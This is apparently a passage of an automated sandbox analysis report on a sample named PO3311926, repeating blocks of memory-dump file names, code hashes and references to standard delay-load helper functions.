                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: aa21ee15d5ba0d4025d7f01a41710e0a705e7f265c4f6c5abb51a35f6d1b8053
                                                                                              • Instruction ID: d14193a6740eb25cb5c682e66251c827a9903703241ed42200a61b0b0781d20b
                                                                                              • Opcode Fuzzy Hash: aa21ee15d5ba0d4025d7f01a41710e0a705e7f265c4f6c5abb51a35f6d1b8053
                                                                                              • Instruction Fuzzy Hash: 6FB012C1699441BE3504A1089C06CFB0ACDC1C6F1433082EFF824C11E0F8C0CD004432
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a7f5288cf70884c0d2bb4e46b594690c708816fec7d061a60a15a646eecd61fd
                                                                                              • Instruction ID: 82078f4940e72196f4c732037cd0bd06601fadad77d4da8cf158d2ae2ef99e34
                                                                                              • Opcode Fuzzy Hash: a7f5288cf70884c0d2bb4e46b594690c708816fec7d061a60a15a646eecd61fd
                                                                                              • Instruction Fuzzy Hash: 96B012C12994417F350462085C02DFB05CDC0C2F1433041EFF824C11E0FCC0CC044432
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 52b41609426dfb33fe075ccfd5fc0bc29b4c243b8b035bff640485aa243f0616
                                                                                              • Instruction ID: 23159d5f82d9a5685623ed9988fa22824c54d493590093c75b1fe998dffb16f3
                                                                                              • Opcode Fuzzy Hash: 52b41609426dfb33fe075ccfd5fc0bc29b4c243b8b035bff640485aa243f0616
                                                                                              • Instruction Fuzzy Hash: B9B012C12994827E350462095D02CFB49CDC0C2F1433081EFF924C11E0FCC0CC014432
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0fe10c1f326a68066812093d6ccfbe412fbb4c6091744a24a1553a9a5b7edf87
                                                                                              • Instruction ID: 2dc42f6f1106fdd71b5bf357d23805c11fcbea026e37df4de6086072cb68c7c5
                                                                                              • Opcode Fuzzy Hash: 0fe10c1f326a68066812093d6ccfbe412fbb4c6091744a24a1553a9a5b7edf87
                                                                                              • Instruction Fuzzy Hash: 2CB012D12994417E350421245C06CFB05CDC0C2F1433041FFF430C04E1F8C0CD044432
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE51F
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: dcd69101c8de0172afd49235e2d998fa12a6043e47d2fe702960e1ac2a2c8e31
                                                                                              • Instruction ID: f3785fd304f78117799aeb4eae9131069d4f250f7adac7cf0372fb94ad740717
                                                                                              • Opcode Fuzzy Hash: dcd69101c8de0172afd49235e2d998fa12a6043e47d2fe702960e1ac2a2c8e31
                                                                                              • Instruction Fuzzy Hash: F6B012C16995417E360461089C0BCFB09CDC0C2F1433083EFF424C11E0F8C0CD444432
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1a7edfa04888a3a799b2cdbdd109fa150240d1f890a9f0e7169036445e52e1a6
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: 1a7edfa04888a3a799b2cdbdd109fa150240d1f890a9f0e7169036445e52e1a6
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3a8992a30c34721fafef9566ae410ac4430377f319fb39d397b2ce9db033eea6
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: 3a8992a30c34721fafef9566ae410ac4430377f319fb39d397b2ce9db033eea6
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fa7f3d1c38cd245611d8c5b48c6d0f1699f5964b573e5e2c2807e05995b2455f
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: fa7f3d1c38cd245611d8c5b48c6d0f1699f5964b573e5e2c2807e05995b2455f
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 6d758a6f4c227b0afdb1e154ccc91a66a291f637ef3efae579f711f9341ab318
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: 6d758a6f4c227b0afdb1e154ccc91a66a291f637ef3efae579f711f9341ab318
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d1bc03ce8e5912bd73fd3f5a1fa03e387c2710800b8e2771908ffc72cc2f6cc3
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: d1bc03ce8e5912bd73fd3f5a1fa03e387c2710800b8e2771908ffc72cc2f6cc3
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 311f505cc52df4b101c333a3e0cd1899d270cac62e77e396a8a2a9a8e78ad4e5
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: 311f505cc52df4b101c333a3e0cd1899d270cac62e77e396a8a2a9a8e78ad4e5
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b2a2a99d0d7d86ccd8ac54eb9577745ecb75d5d8ae77e8db75730f36cdc7c949
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: b2a2a99d0d7d86ccd8ac54eb9577745ecb75d5d8ae77e8db75730f36cdc7c949
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: bf585a55fadc3c1fee5e1101d052f6f71219f0af84417faaa72d00cf23f53fa0
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: bf585a55fadc3c1fee5e1101d052f6f71219f0af84417faaa72d00cf23f53fa0
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: cf4658da5709530f2a85dc59be114d5f388ecda728bbe50dd172719e0d1e0048
                                                                                              • Instruction ID: 8f783e01db715d457a31eab5b067139004ad716848fdb29046e44b207a5e1d67
                                                                                              • Opcode Fuzzy Hash: cf4658da5709530f2a85dc59be114d5f388ecda728bbe50dd172719e0d1e0048
                                                                                              • Instruction Fuzzy Hash: B5A011E22A8002BE30082202AC03CFB02CEC0C0B20330C8AEF822C00A0B8C0A8000830
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00BBE1E3
                                                                                                • Part of subcall function 00BBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBE8D0
                                                                                                • Part of subcall function 00BBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
